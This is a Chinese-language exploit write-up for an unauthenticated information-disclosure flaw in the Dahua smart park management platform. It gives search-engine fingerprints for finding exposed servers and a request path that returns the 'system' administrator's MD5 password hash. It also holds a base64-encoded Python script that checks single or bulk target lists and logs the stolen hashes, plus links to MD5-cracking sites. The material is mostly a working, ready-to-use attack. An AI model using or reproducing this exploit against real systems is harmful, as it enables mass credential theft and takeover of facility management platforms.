banner

FOFA: app="dahua-智慧园区综合管理平台"
鹰图指纹:web.body="/WPMS/asset/lib/gridster/"

访问路径:
/admin/user_getUserInfoByUserName.action?userName=system

响应:响应数据里存在 system MD5的密码 则存在漏洞
如图:
2023-12-04T17:14:19.png

POC1:
/admin/user_getUserInfoByUserName.action?userName=system

POC2:
检测脚本:
IyBfKl8gY29kaW5nOnV0Zi04IF8qXwojIEBUaW1lIDogMjAyMy85LzE3IDIxOjI5CiMgQEF1dGhvcjog5Li66LWL5paw6K+N5by66K+05oSBCiMgRk9GQe+8miBhcHA9ImRhaHVhLeaZuuaFp+WbreWMuue7vOWQiOeuoeeQhuW5s+WPsCIKIAppbXBvcnQgcmVxdWVzdHMKaW1wb3J0IGFyZ3BhcnNlCmZyb20gZGF0ZXRpbWUgaW1wb3J0IGRhdGV0aW1lCiAKcmVxdWVzdHMucGFja2FnZXMudXJsbGliMy5kaXNhYmxlX3dhcm5pbmdzKCkKIAogCmRlZiB1c2FnZSgpOgogICAgcHJpbnQoJycnCiAgICArLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0rCiAgICAgICAgICAgICAgICDlvq7kv6HlhazkvJflj7cgICAg572R57uc5a6J5YWo6YCP6KeG6ZWcIAogICAg5q2k6ISa5pys5LuF55So5LqO5a2m5Lmg5oiW57O757uf6Ieq5qOA5p+lCiAgICDkvb/nlKjmlrnms5U6CiAgICAgICAg5Y2V5LiqIHB5dGhvbjMgZGFodWFTeXN0ZW1Qd2RSZWFkLnB5IC11IHVybFvkvosgaHR0cDovLzEyNy4wLjAuMTo4MDgwXQogICAgICAgIOaJuemHjyBweXRob24zIGRhaHVhU3lzdGVtUHdkUmVhZC5weSAtZiBmaWxlbmFtZQogICAgKy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tKyAgICAgICAgIAogCiAgICDmoLnmja7jgIrkuK3ljY7kurrmsJHlhbHlkozlm73liJHms5XjgIvop4TlrprvvIzov53lj43lm73lrrbop4TlrprvvIzlr7norqHnrpfmnLrkv6Hmga/ns7vnu5/lip/og73ov5vooYzliKDpmaTjgIHkv67mlLnjgIHlop7liqDjgIHlubLmibDvvIzpgKDmiJDorqHnrpfmnLrkv6Hmga/ns7vnu5/kuI3og73mraPluLjov5DooYznmoTvvIzlpITkupTlubTku6XkuIvmnInmnJ/lvpLliJHmiJbogIXmi5jlvbnvvJvlkI7mnpznibnliKvkuKXph43nmoTvvIzlpITkupTlubTku6XkuIrmnInmnJ/lvpLliJHjgIIK6L+d5Y+N5Zu95a626KeE5a6a77yM5a+56K6h566X5py65L+h5oGv57O757uf5Lit5a2Y5YKo44CB5aSE55CG5oiW6ICF5Lyg6L6T55qE5pWw5o2u5ZKM5bqU55So56iL5bqP6L+b6KGM5Yig6Zmk44CB5L+u5pS544CB5aKe5Yqg55qE5pON5L2c77yM5ZCO5p6c5Lil6YeN55qE77yM5L6d54Wn5YmN5qy+55qE6KeE5a6a5aSE572a44CCCiAKICAgICcnJykKIAogCiMgcHJveGllcyA9IHsnaHR0cCc6J2h0dHA6Ly8xMjcuMC4wLjE6MTA4MDh9CiAKZGVmIGV4cChjaGVja191cmwscmVzcF9qc29uKToKICAgIHNlbGVjdCA9IGlucHV0KCLmmK/lkKbor7vlj5ZzeXN0ZW3nlKjmiLflr4bnoIHvvIjmmK/vvJoxLOWQpu+8mjApOiIpCiAgICAjdXNhZ2UoKQogCiAgICBpZiBzZWxlY3QgPT0gIjEiOgogICAgICAgIHByaW50KGYie2NoZWNrX3VybH0gIHN5c3RlbeeUqOaIt21kNeWvhueggeS4uu+8mntyZXNwX2pzb25bJ2xvZ2luUGFzcyddfSzlj6/liY3lvoBodHRwczovL3d3dy5jbWQ1LmNvbSDov5vooYzop6Plr4YiKQogICAgICAgIHByaW50KCdcbicpCiAgICBlbGlmIHNlbGVjdCA9PSAiMCI6CiAgICAgICAgZXhpdCgpCiAgICBlbHNlOgogICAgICAgIHByaW50KCLor7fph43mlrDovpPlhaXmraPnoa7pgInpobkiKQogCmRlZiBzYXZlX2ZpbGUodXJsLHBhc3N3b3JkKToKICAgIG5vdyA9IGRhdGV0aW1lLm5vdygpCiAgICBmaWxlcGF0aCA9IG5vdy5zdHJmdGltZSgiJVktJW0tJWQgJUgiKSsnX3Jlc3VsdC50eHQnCiAgICByZXN1bHQgPSBmInt1cmx9IHN5c3RlbeeUqOaIt+eZu+W9leWvhueggeS4ulx0e3Bhc3N3b3JkfSIKICAgIHdpdGggb3BlbihmaWxlcGF0aCxtb2RlPSdhJyxlbmNvZGluZz0ndXRmLTgnKSBhcyBmOgogICAgICAgIGYud3JpdGUocmVzdWx0KydcbicpCiAKZGVmIHBvYyhjaGVja191cmwsZmxhZyk6CiAgICB1cmwgPSBjaGVja191cmwgKyAiL2FkbWluL3VzZXJfZ2V0VXNlckluZm9CeVVzZXJOYW1lLmFjdGlvbj91c2VyTmFtZT1zeXN0ZW0iCiAgICBoZWFkZXIgPSB7CiAgICAgICAgIlVzZXItQWdlbnQiOiAiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2IiwKICAgIH0KICAgIG5vd19wb2MgPSBkYXRldGltZS5ub3coKQogICAgdHJ5OgogICAgICAgIHJlc3BvbnNlID0gcmVxdWVzdHMuZ2V0KHVybD11cmwsIGhlYWRlcnM9aGVhZGVyLCB0aW1lb3V0PTMsIHZlcmlmeT1GYWxzZSkKICAgICAgICAjIHByaW50KHJlc3BvbnNlLmpzb24oKSkKICAgICAgICByZXNwX2pzb24gPSByZXNwb25zZS5qc29uKCkKICAgICAgICByZXNwb25zZS5jbG9zZSgpCiAgICAgICAgaWYgcmVzcF9qc29uWydsb2dpblBhc3MnXSAhPSBOb25lOgogICAgICAgICAgICBwcmludChmJ1srXXtub3dfcG9jLnN0cmZ0aW1lKCIlWS0lbS0lZCAlSDolTTolUyIpfVx0e2NoZWNrX3VybH1cdOa8j+a0nuWtmOWcqCcpCiAgICAgICAgZWxzZToKICAgICAgICAgICAgcHJpbnQoZidbLV17bm93X3BvYy5zdHJmdGltZSgiJVktJW0tJWQgJUg6JU06JVMiKX1cdHtjaGVja191cmx9XHTmvI/mtJ7kuI3lrZjlnKgnKQogICAgICAgIGlmIGZsYWcgPT0gMToKICAgICAgICAgICAgZXhwKGNoZWNrX3VybCxyZXNwX2pzb24pCiAgICAgICAgZWxzZToKICAgICAgICAgICAgc2F2ZV9maWxlKGNoZWNrX3VybCxyZXNwX2pzb25bJ2xvZ2luUGFzcyddKQogICAgZXhjZXB0IEV4Y2VwdGlvbiBhcyBlOgogICAgICAgIHByaW50KGYnWy1de25vd19wb2Muc3RyZnRpbWUoIiVZLSVtLSVkICVIOiVNOiVTIil9XHR7Y2hlY2tfdXJsfVx05peg5rOV6K6/6Zeu77yM6K+35qOA5p+l55uu5qCH56uZ54K55piv5ZCm5a2Y5ZyoJykKIAogCmRlZiBydW4oZmlsZXBhdGgpOgogICAgdXNhZ2UoKQogICAgZmxhZyA9IDAKICAgIHVybHMgPSBbeC5zdHJpcCgpIGZvciB4IGluIG9wZW4oZmlsZXBhdGgsICJyIikucmVhZGxpbmVzKCldCiAgICBmb3IgbGluZSBpbiB1cmxzOgogICAgICAgIGxpbmUgPSBsaW5lLnN0cmlwKCkKICAgICAgICBpZiAnaHR0cCcgaW4gbGluZToKICAgICAgICAgICAgdXJsID0gbGluZQogICAgICAgIGVsaWYgJ2h0dHBzJyBpbiBsaW5lOgogICAgICAgICAgICB1cmwgPSBsaW5lCiAgICAgICAgZWxzZToKICAgICAgICAgICAgdXJsID0gJ2h0dHA6Ly8nICsgbGluZQogICAgICAgIHBvYyh1cmwsZmxhZykKIAogCmRlZiBtYWluKCk6CiAgICBwYXJzZSA9IGFyZ3BhcnNlLkFyZ3VtZW50UGFyc2VyKCkKICAgIHBhcnNlLmFkZF9hcmd1bWVudCgiLXUiLCAiLS11cmwiLCBoZWxwPSJweXRob24gZGFodWFTeXN0ZW1Qd2RSZWFkLnB5IC11IHVybCIpCiAgICBwYXJzZS5hZGRfYXJndW1lbnQoIi1mIiwgIi0tZmlsZSIsIGhlbHA9InB5dGhvbiBkYWh1YVN5c3RlbVB3ZFJlYWQucHkgIC1mIGZpbGUiKQogICAgYXJncyA9IHBhcnNlLnBhcnNlX2FyZ3MoKQogICAgdXJsID0gYXJncy51cmwKICAgIGZpbGVwYXRoID0gYXJncy5maWxlCiAgICBpZiB1cmwgaXMgbm90IE5vbmUgYW5kIGZpbGVwYXRoIGlzIE5vbmU6CiAgICAgICAgZmxhZyA9IDEKICAgICAgICBwb2ModXJsLGZsYWcpCiAgICBlbGlmIHVybCBpcyBOb25lIGFuZCBmaWxlcGF0aCBpcyBub3QgTm9uZToKICAgICAgICBydW4oZmlsZXBhdGgpCiAgICBlbHNlOgogICAgICAgIHVzYWdlKCkKIAogCmlmIF9fbmFtZV9fID09ICdfX21haW5fXyc6CiAgICBtYWluKCk=

poc2验证如图:
2023-12-04T17:15:02.png

MD5解密平台:

免费:https://www.somd5.com/
可能收费:https://www.cmd5.com/